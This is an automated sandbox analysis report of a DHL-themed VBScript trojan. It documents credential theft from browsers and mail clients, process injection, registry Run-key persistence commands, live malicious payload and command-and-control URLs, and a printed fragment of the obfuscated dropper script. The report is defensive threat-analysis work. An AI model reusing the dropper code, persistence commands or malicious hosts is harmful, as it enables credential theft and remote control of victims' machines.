            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/26 07:41:23 Program Manager]
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2933 cpuid 8_2_222E2933
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_222E2264
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 19_2_004082CD
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041739B GetVersionExW, 16_2_0041739B
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\SysWOW64\clip.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 19_2_004033F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 19_2_00402DB3
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 19_2_00402DB3
            Source: Yara match File source: Process Memory Space: wab.exe PID: 1496, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: wab.exe PID: 6624, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match; File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts1
            Windows Management Instrumentation
            221
            Scripting
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            11
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            2
            Credentials in Registry
            3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts212
            Command and Scripting Interpreter
            Login Hook412
            Process Injection
            1
            Software Packing
            1
            Credentials In Files
            29
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell
            Network Logon Script11
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            LSA Secrets1
            Query Registry
            SSH2
            Clipboard Data
            24
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials151
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry
            DCSync141
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
            Virtualization/Sandbox Evasion
            Proc Filesystem4
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection
            Network Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Behavior graph (image not reproduced): Behavior Graph ID: 1431984, Sample: DHL_ES567436735845755676678..., Startdate: 26/04/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label
            DHL_ES567436735845755676678877988975877.vbs | 35% | ReversingLabs | Script.Trojan.Heuristic
            DHL_ES567436735845755676678877988975877.vbs | 5% | Virustotal |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            jgbours284hawara01.duckdns.org | 7% | Virustotal |
            europrotectie.ro | 0% | Virustotal |
            geoplugin.net | 4% | Virustotal |
            www.duelvalenza.it | 0% | Virustotal |
            duelvalenza.it | 3% | Virustotal |
            Source | Detection | Scanner | Label
            http://www.imvu.comr | 0% | URL Reputation | safe
            http://www.imvu.comr | 0% | URL Reputation | safe
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
            https://go.micro | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
            http://crl.micro | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            http://crl.v | 0% | URL Reputation | safe
            http://www.ebuddy.com | 0% | URL Reputation | safe
            https://duelvalenza.it/FIPWKWOaFXJGe178.bin | 0% | Avira URL Cloud | safe
            jgbours284hawara01.duckdns.org | 100% | Avira URL Cloud | malware
            http://geoplugin.net/json.gpf | 0% | Avira URL Cloud | safe
            http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin | 0% | Avira URL Cloud | safe
            http://crl.microD | 0% | Avira URL Cloud | safe
            http://87.121.105.163 | 0% | Avira URL Cloud | safe
            https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin | 0% | Avira URL Cloud | safe
            jgbours284hawara01.duckdns.org | 7% | Virustotal |
            http://europrotectie.ro | 0% | Avira URL Cloud | safe
            https://europrotectie.ro/Methink1.thnXRwl | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gp0B8 | 0% | Avira URL Cloud | safe
            http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin | 3% | Virustotal |
            https://europrotectie.ro/Methink1.thn | 0% | Avira URL Cloud | safe
            http://europrotectie.ro | 0% | Virustotal |
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
            https://duelvalenza.it/ | 0% | Avira URL Cloud | safe
            http://87.121.105.163 | 18% | Virustotal |
            https://duelvalenza.it/ | 3% | Virustotal |
            http://geoplugin.net/json.gpf | 0% | Virustotal |
            https://europrotectie.ro/Methink1.thn | 0% | Virustotal |
            https://duelvalenza.it/FIPWKWOaFXJGe178.binq( | 0% | Avira URL Cloud | safe
            https://europrotectie.ro | 0% | Avira URL Cloud | safe
            http://87.121.105.163/Detentionen.javaXRwl | 0% | Avira URL Cloud | safe
            http://87.121.108 | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gp)B | 0% | Avira URL Cloud | safe
            https://europrotectie.ro/Methink1.thnP | 0% | Avira URL Cloud | safe
            http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== | 0% | Avira URL Cloud | safe
            https://europrotectie.ro | 0% | Virustotal |
            http://87.121.105.163/PUzAKuQ35.bin | 0% | Avira URL Cloud | safe
            http://87.121.105.163/Detentionen.javaXRwl4 | 0% | Avira URL Cloud | safe
            http://www.imvu.comata | 0% | Avira URL Cloud | safe
            http://crl.mM5 | 0% | Avira URL Cloud | safe
            http://87.121.105.163/Detentionen.java | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            jgbours284hawara01.duckdns.org | 45.88.90.110 | true | true | | unknown
            www.387mfyr.sbs | 137.220.252.40 | true | false | | unknown
            led-svitidla.eu | 37.235.104.9 | true | false | | unknown
            europrotectie.ro | 188.212.111.134 | true | false | | unknown
            geoplugin.net | 178.237.33.50 | true | false | | unknown
            duelvalenza.it | 46.254.34.12 | true | false | | unknown
            www.duelvalenza.it | unknown | unknown | true | | unknown
            www.led-svitidla.eu | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://duelvalenza.it/FIPWKWOaFXJGe178.bin | false | Avira URL Cloud: safe | unknown
            jgbours284hawara01.duckdns.org | true | 7%, Virustotal; Avira URL Cloud: malware | unknown
            http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
            https://europrotectie.ro/Methink1.thn | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
            http://87.121.105.163/PUzAKuQ35.bin | false | Avira URL Cloud: safe | unknown
            http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== | false | Avira URL Cloud: safe | unknown
            http://87.121.105.163/Detentionen.java | false | Avira URL Cloud: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            188.212.111.134 | europrotectie.ro | Romania | 48881 | DATA-NODE-ASRO | false
            137.220.252.40 | www.387mfyr.sbs | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false
            87.121.105.163 | unknown | Bulgaria | 43561 | NET1-ASBG | false
            178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
            45.88.90.110 | jgbours284hawara01.duckdns.org | Bulgaria | 10753 | LVLT-10753US | true
            46.254.34.12 | duelvalenza.it | Italy | 52030 | SERVERPLAN-ASIT | false
            Joe Sandbox version: 40.0.0 Tourmaline
            Analysis ID: 1431984
            Start date and time: 2024-04-26 07:39:06 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 11m 34s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 34
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: DHL_ES567436735845755676678877988975877.vbs
            Detection: MAL
            Classification: mal100.phis.troj.spyw.expl.evad.winVBS@54/18@7/6
            EGA Information:
            • Successful, ratio: 62.5%
            HCA Information:
            • Successful, ratio: 96%
                                            • Number of executed functions: 228
                                            • Number of non-executed functions: 212
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 2132 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 2668 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 5804 because it is empty
                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 07:39:53 | API Interceptor | 213x Sleep call for process: powershell.exe modified |
| 07:40:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Vibeka %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges) |
| 07:40:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Vibeka %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges) |
| 07:41:12 | API Interceptor | 266771x Sleep call for process: wab.exe modified |
| 07:41:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bynkefugls %Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv) |
| 07:41:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bynkefugls %Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv) |
| 07:41:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER C:\Program Files (x86)\windows mail\wab.exe |
| 07:41:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER C:\Program Files (x86)\windows mail\wab.exe |
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):961
                                            Entropy (8bit):5.00769637274414
                                            Encrypted:false
                                            SSDEEP:12:tkEQnd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7+:qPdRNuKyGX85JvXhNlT3/7SxDWro
                                            MD5:BB19280E017D2F9A45F96479794EDA2B
                                            SHA1:0B90C47DC19AE285F7F4BA6557174D29827BFE44
                                            SHA-256:BA2C6ED473707347D40A4ED1B317325A0B78016A36B2A6A9DA43EB2CF63B9046
                                            SHA-512:52B868D2AA5E0C867E7EA7D81A7113FF5B5B39068B4543D113691B39EDD05FD8A1D57F446FE62083247933C347698193CCB72A78732F7E3319736CD5326C6F63
                                            Malicious:false
                                            Preview:{. "geoplugin_request":"102.129.152.220",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):11608
                                            Entropy (8bit):4.886255615007755
                                            Encrypted:false
                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                            Malicious:false
                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1436
                                            Entropy (8bit):5.437764879487421
                                            Encrypted:false
                                            SSDEEP:24:3jmWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8oHr689fOcT4:zmWSU4y4RQmFoUeWmfmZ9tK8NWR8oHXI
                                            MD5:593D19E3C65563C1C1D73237D902B1B6
                                            SHA1:CDE70F31ADC8EE7487CF517832C331746A9D94DD
                                            SHA-256:5AC398D2E84850C039D71773FB268073126DC9198DF4B7248B4CCE48A5093B1C
                                            SHA-512:09FC89B566EE2F0EA648BB9FB69A92F6E3028F50A2ABD46E57E68767A08E274E0C1FF7A278AC9EDEBBC3490B66BBE6D6B7D1F82E51046CBD9ED5C91A1B25BF0D
                                            Malicious:false
                                            Preview:@...e...........%.....................&..............@..........P................1]...E.....%.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:ASCII text, with very long lines (335), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8587
                                            Entropy (8bit):5.25529939095443
                                            Encrypted:false
                                            SSDEEP:192:mqP55HoHhiNKQepDyqvxsZWVjFS0FGl0QKK:mG/oHgEtDyqvxQmA0FGWQKK
                                            MD5:0F7343F135E619692979BCB2818EE1B9
                                            SHA1:9D1D760475FDFDC5C69E97A67884442FE0B53245
                                            SHA-256:0B904E322E186D4D593C0057CE972F1B4317DD59855F65BCA513B63AA01EC14F
                                            SHA-512:E3F1CC9DB3A19896761A75973FDC2D8BE71C70247F37C213B35290D4F1D992F087DBD54BC4677BBEB29041745819086B72E1DB799196C4F4859BFE3CD4902578
                                            Malicious:true
                                            Preview:........Set Posttympanic = CreateObject("Scripting.FileSystemObject")......Melene = Posttympanic.OpenTextFile("C:\windows\notepad.exe", 1).ReadAll....Evaporator = instr(1,Melene,"u")......Set Energised = CreateObject("WScript.Shell")....Gejster = "s"....fljtekedlers = "Sapim"....Knaldromanerne = "replace"......Pyromanbrands = mid(Melene,Evaporator,1)....Nothus = "Alter"......su9 = su9 & "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='AlterbSapimtrin';$Fornrmet+='g';FAlternction CircAltermflexeSapim($CAltermAlterlet){$Semimonarchically=$CAltermAlterlet.Length-$Raakolde;For($HabitAlterally=4; $HabitAlterally -lt $Semimonarchically; $HabitAlterally+=(5)){$Wenzel+=$CAltermAlterlet.$Fornrmet.Invoke($HabitA"..su9 = su9 & "lterally, $Raakolde);}$Wenzel;}fAlternction JetteSapim($trendy){&($IndbagendeSapim) ($trendy);}$SimAlterltanSapimcenerSapim=CircAltermflexeSapim 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,Sapimp Ryg.( KrmW.AlterrdiRiitn Sapim rdPi do.orhwAlloSapimHjem G,oN PraT.oli
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
